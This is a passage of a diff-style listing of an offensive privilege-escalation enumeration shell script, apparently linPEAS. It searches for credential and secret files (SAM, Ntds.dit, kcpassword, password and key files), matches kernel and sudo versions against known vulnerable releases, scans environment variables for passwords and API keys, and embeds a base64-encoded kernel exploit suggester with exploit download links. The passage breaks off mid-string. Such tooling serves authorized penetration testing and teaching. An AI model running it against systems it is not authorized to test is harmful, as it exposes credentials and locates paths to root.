"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) - - - ##### POST SERACH VARIABLES ##### - backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" - printf ${YELLOW}"DONE\n"$NC - echo "" -fi - - -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" - - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - if [ "$(command -v bash 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMCwgQF9temV0XwojCiMgbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggY29tZXMgd2l0aCBBQlNPTFVURUxZIE5PIFdBUlJBTlRZLgojIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSwgYW5kIHlvdSBhcmUgd2VsY29tZSB0byByZWRpc3RyaWJ1dGUgaXQKIyB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLiBTZWUgTElDRU5TRQojIGZpbGUgZm9yIHVzYWdlIG9mIHRoaXMgc29mdHdhcmUuCiMKClZFUlNJT049djEuMQoKIyBiYXNoIGNvbG9ycwojdHh0cmVkPSJcZVswOzMxbSIKdHh0cmVkPSJcZVs5MTsxbSIKdHh0Z3JuPSJcZVsxOzMybSIKdHh0Z3JheT0iXGVbMDszN20iCnR4dGJsdT0iXGVbMDszNm0iCnR4dHJzdD0iXGVbMG0iCmJsZHdodD0nXGVbMTszN20nCndodD0nXGVbMDszNm0nCmJsZGJsdT0nXGVbMTszNG0nCnllbGxvdz0nXGVbMTs5M20nCmxpZ2h0eWVsbG93PSdcZVswOzkzbScKCiMgaW5wdXQgZGF0YQpVTkFNRV9BPSIiCgojIHBhcnNlZCBkYXRhIGZvciBjdXJyZW50IE9TCktFUk5FTD0iIgpPUz0iIgpESVNUUk89IiIKQVJDSD0iIgpQS0dfTElTVD0iIgoKIyBrZXJuZWwgY29uZmlnCktDT05GSUc9IiIKCkNWRUxJU1RfRklMRT0iIgoKb3B0X2ZldGNoX2JpbnM9ZmFsc2UKb3B0X2ZldGNoX3NyY3M9ZmFsc2UKb3B0X2tlcm5lbF92ZXJzaW9uPWZhbHNlCm9wdF91bmFtZV9zdHJpbmc9ZmFsc2UKb3B0X3BrZ2xpc3RfZmlsZT1mYWxzZQpvcHRfY3ZlbGlzdF9maWxlPWZhbHNlCm9wdF9jaGVja3NlY19tb2RlPWZhbHNlCm9wdF9mdWxsPWZhbHNlCm9wdF9zdW1tYXJ5PWZhbHNlCm9wdF9rZXJuZWxfb25seT1mYWxzZQpvcHRfdXNlcnNwYWNlX29ubHk9ZmFsc2UKb3B0X3Nob3dfZG9zPWZhbHNlCm9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCm9wdF9za2lwX3BrZ192ZXJzaW9ucz1mYWxzZQoKQVJHUz0KU0hPUlRPUFRTPSJoVmZic3U6azpkcDpnIgpMT05HT1BUUz0iaGVscCx2ZXJzaW9uLGZ1bGwsZmV0Y2gtYmluYXJpZXMsZmV0Y2gtc291cmNlcyx1bmFtZTosa2VybmVsOixzaG93LWRvcyxwa2dsaXN0LWZpbGU6LHNob3J0LGtlcm5lbHNwYWNlLW9ubHksdXNlcnNwYWNlLW9ubHksc2tpcC1tb3JlLWNoZWNrcyxza2lwLXBrZy12ZXJzaW9ucyxjdmVsaXN0LWZpbGU6LGNoZWNrc2VjIgoKIyMgZXhwbG9pdHMgZGF0YWJhc2UKZGVjbGFyZSAtYSBFWFBMT0lUUwpkZWNsYXJlIC1hIEVYUExPSVRTX1VTRVJTUEFDRQoKIyMgdGVtcG9yYXJ5IGFycmF5IGZvciBwdXJwb3NlIG9mIHNvcnRpbmcgZXhwbG9pdHMgKGJhc2VkIG9uIGV4cGxvaXRzJyByYW5rKQpkZWNsYXJlIC1hIGV4cGxvaXRzX3RvX3NvcnQKZGVjbGFyZSAtYSBTT1JURURfRVhQTE9JVFMKCiMjIyMjIyMjIyMjIyBMSU5VWCBLRVJORUxTUEFDRSBFWFBMT0lUUyAjIyMjIyMjIyMjIyMjIyMjIyMjIwpuPTAKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBlbGZsYmwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9Mi40LjI5ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vaXNlYy5wbC92dWxuZXJhYmlsaXRpZXMvaXNlYy0wMDIxLXVzZWxpYi50eHQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2VsZmxibApleHBsb2l0LWRiOiA3NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSB1c2VsaWIoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApleHBsb2l0LWRiOiA3NzgKQ29tbWVudHM6IEtub3duIHRvIHdvcmsgb25seSBmb3IgMi40IHNlcmllcyAoZXZlbiB0aG91Z2ggMi42IGlzIGFsc28gdnVsbmVyYWJsZSkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBrcmFkMwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjUsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAxMzk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDQtMDA3N10ke3R4dHJzdH0gbXJlbWFwX3B0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE2MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHJhcHRvcl9wcmN0bApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEzLHZlcjw9Mi42LjE3ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMjAzMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA1CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGw0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDExCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMzYyNl0ke3R4dHJzdH0gaDAwbHlzaGl0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuOCx2ZXI8PTIuNi4xNgpUYWdzOgpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9oMDBseXNoaXQKZXhwbG9pdC1kYjogMjAxMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE3LHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIzLHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTQyMTBdJHt0eHRyc3R9IGZ0cmV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTEsdmVyPD0yLjYuMjIKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA2ODUxCkNvbW1lbnRzOiB3b3JsZC13cml0YWJsZSBzZ2lkIGRpcmVjdG9yeSBhbmQgc2hlbGwgdGhhdCBkb2VzIG5vdCBkcm9wIHNnaWQgcHJpdnMgdXBvbiBleGVjIChhc2gvc2FzaCkgYXJlIHJlcXVpcmVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtNDIxMF0ke3R4dHJzdH0gZXhpdF9ub3RpZnkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yNSx2ZXI8PTIuNi4yOQpUYWdzOgp